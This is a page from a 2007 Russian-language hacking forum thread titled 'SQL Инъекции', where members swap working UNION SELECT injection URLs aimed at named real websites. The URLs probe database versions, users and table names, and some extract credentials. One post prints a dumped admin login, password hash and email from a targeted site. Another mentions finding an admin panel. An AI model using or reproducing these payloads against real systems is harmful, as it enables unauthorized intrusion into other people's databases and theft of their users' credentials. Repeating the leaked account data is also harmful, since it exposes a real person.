FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 86 из 1602

Опции темы

Поиск в этой теме

Опции просмотра

11.03.2007, 00:24

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Цитата:

http://www.iou-ramps.com/shop.php?id=-13+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13

2 n1†R0x
там СЕЙФ Мод Он вроде

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

11.03.2007, 00:37

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

Spyder, http://www.multidmedia.com/admin/ у меня тут админка. я хз что с тобой

11.03.2007, 00:38

Colkru

Участник форума

Регистрация: 13.01.2007

Сообщений: 160

Провел на форуме:
865816

Репутация: 181

Отправить сообщение для Colkru с помощью ICQ

http://www.spoono.com/php/tutorials/tutorial.php?id=-1+union+select+1,2,concat(user,char(58),password), 4,5,6,7,8+from+users/*

11.03.2007, 00:43

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

Код:

http://www.nero.com/eng/showpress.php?id=1015+order+by+13

Nero однако...хотя когда селект делаю не прокатывает

ну хоть что-то

Код:

http://www.phpcomasy.com/index.php?id=7&mod_action=project_detail&mod_project_id=-9+union+select+1,2,3,4,5,6,7

Код:

http://director-online.com/buildArticle.php?id=-1147+union+select+1,2,3,4,5,6,7,8+from+user/*

чёт с выводом у мня напряги

Последний раз редактировалось n0ne; 11.03.2007 в 01:05..

11.03.2007, 02:09

злюка

Постоянный

Регистрация: 11.11.2005

Сообщений: 317

Провел на форуме:
2848854

Репутация: 409

Отправить сообщение для злюка с помощью ICQ

Цитата:

Сообщение от n0ne

Код:

http://director-online.com/buildArticle.php?id=-1147+union+select+1,2,3,4,5,6,7,8+from+user/*

чёт с выводом у мня напряги

бедный директор...сколько его мучают, а он всё он-лайн бедняга

11.03.2007, 01:18

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

2 n0ne
думаю, с парсингом проблем не будет

Код:

http://www.phpcomasy.com/index.php?id=7&mod_action=project_detail&mod_project_id=-9+union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+from+user

база юзеров в формате login:рassword:email
admin f1a81d782dea6a19bdca383bffe68452 ez@noreality.ch

Последний раз редактировалось n1†R0x; 11.03.2007 в 01:24..

11.03.2007, 03:34

-=lebed=-

Флудер

Регистрация: 21.06.2006

Сообщений: 3,193

Провел на форуме:
12702287

Репутация: 4738

_http://www.toumaz.com/news/news.php?id=1000+union+select+1,2,3,version(),user (),6/*

_http://www.uecmoedling.at/news/news.php?id=90+union+select+111,222,333,user(),555 ,666,version(),888,999/*

_http://www.aoecs.org/news/news.php?id=30+union+select+1,2,version(),user(),5 ,6,7,8/*

Последний раз редактировалось -=lebed=-; 11.03.2007 в 05:27..

11.03.2007, 11:46

Iceangel_

Постоянный

Регистрация: 09.07.2006

Сообщений: 553

Провел на форуме:
7561206

Репутация: 1861

http://www.happyland-drink.ru/brands.php?id=46%20AND%201=0%20UNION%20SELECT%201, user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25/*

11.03.2007, 12:21

-=lebed=-

Флудер

Регистрация: 21.06.2006

Сообщений: 3,193

Провел на форуме:
12702287

Репутация: 4738

_http://www.alutis.lt/news/news.php?id=-1+union+select+1,2,3,user(),version()/*

P.S. 4 поле, например user() можно посмотреть в имени рисунка (свойства картинки).

_http://www.austadiums.com/news/news.php?id=-1+union+select+user(),version()/*

_http://www.verticalworld.net/news/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*
количество колонок подобрал, но имхо нет прав на добавление новости, поэтому sql-inj не работает...

Последний раз редактировалось -=lebed=-; 11.03.2007 в 13:34..

#10

11.03.2007, 13:45

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Код:

http://www.jobit.ru/index.php?mod=employer&act=firminfo&id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version(),0x0),0x0),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

таблицу подобрать не смог

Код:

http://www.urasvadba.ru/otziv.php?id=-1+union+select+1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+information_schema.tables+limit+0,1/*

тут mysql5, но имхо пустышка) юзеров.нет

Последний раз редактировалось n1†R0x; 11.03.2007 в 13:47..